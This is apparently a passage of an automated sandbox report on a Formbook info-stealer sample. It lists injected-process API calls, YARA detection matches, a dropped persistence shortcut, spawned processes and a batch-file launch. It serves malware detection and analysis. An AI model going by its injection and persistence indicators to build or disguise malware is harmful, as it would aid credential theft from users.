        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9B00 NtSetValueKey,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031AA3B0 NtGetContextThread,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9A10 NtQuerySection,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9A80 NtOpenDirectoryObject,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9950 NtQueueApcThread,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A99D0 NtCreateProcessEx,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9820 NtEnumerateKey,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031AB040 NtSuspendThread,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A98A0 NtWriteVirtualMemory,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031AA710 NtOpenProcessToken,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9730 NtQueryVirtualMemory,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9770 NtSetInformationFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031AA770 NtOpenThread,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9760 NtOpenProcess,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9FE0 NtCreateMutant,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9610 NtEnumerateValueKey,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9650 NtQueryValueKey,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9670 NtQueryInformationProcess,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A96D0 NtCreateKey,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031AAD30 NtSetContextThread,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9520 NtWaitForSingleObject,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9560 NtWriteFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A95F0 NtQueryInformationFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00401030
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041D97B
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DADA
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DBC0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00402D90
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DDA4
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041E654
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DE0B
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00409E2E
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00409E30
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041CEE3
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041CEE6
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DEFF
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DF1F
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00402FB0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0319EBB0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0316F900
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03184120
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03221002
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0317B090
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031920A0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03186E30
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03160D20
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03231D55
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03192581
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0317D5E0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0317841F
        Source: C:\Users\user\AppData\Local\Mqbmnet.exe | Code function: 19_3_04B26EB0
        Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 50484224 appears 50 times
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe | Code function: String function: 0231C890 appears 48 times
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 0316B150 appears 32 times
        Source: C:\Users\user\AppData\Local\Mqbmnet.exe | Code function: String function: 04B2B4A4 appears 32 times
        Source: C:\Users\user\AppData\Local\Mqbmnet.exe | Code function: String function: 04B23AF4 appears 40 times
        Source: Mqbmupv_Signed_.exe | Static PE information: invalid certificate
        Source: Mqbmupv_Signed_.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: Mqbmupv_Signed_.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Mqbmnet.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: Mqbmnet.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Mqbmupv_Signed_.exe, 00000000.00000000.204808352.0000000000465000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameYes( vs Mqbmupv_Signed_.exe
        Source: 00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.218533386.0000000002358000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218533386.0000000002358000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000000.00000003.218413577.0000000002358000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218413577.0000000002358000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000013.00000003.326806976.0000000004B7C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000013.00000003.326806976.0000000004B7C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.218936483.000000000238C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218936483.000000000238C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219090814.00000000023D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219090814.00000000023D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219039439.00000000023BC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219039439.00000000023BC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219132756.0000000002404000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219132756.0000000002404000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000013.00000003.326571745.0000000004B64000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000013.00000003.326571745.0000000004B64000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000015.00000003.340471600.000000000447C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000015.00000003.340471600.000000000447C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219141358.00000000023EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219141358.00000000023EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPED | Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPED | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/9@5/5
        Source: C:\Windows\SysWOW64\notepad.exeCode function: 2_2_5048784E GetDiskFreeSpaceA,
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile created: C:\Users\user\AppData\Local\Mqbmnet.exeJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\SysWOW64\notepad.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Mqbmupv_Signed_.exeVirustotal: Detection: 27%
        Source: Mqbmupv_Signed_.exeReversingLabs: Detection: 45%
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Users\user\Desktop\Mqbmupv_Signed_.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Mqbmupv_Signed_.exe 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: unknownProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
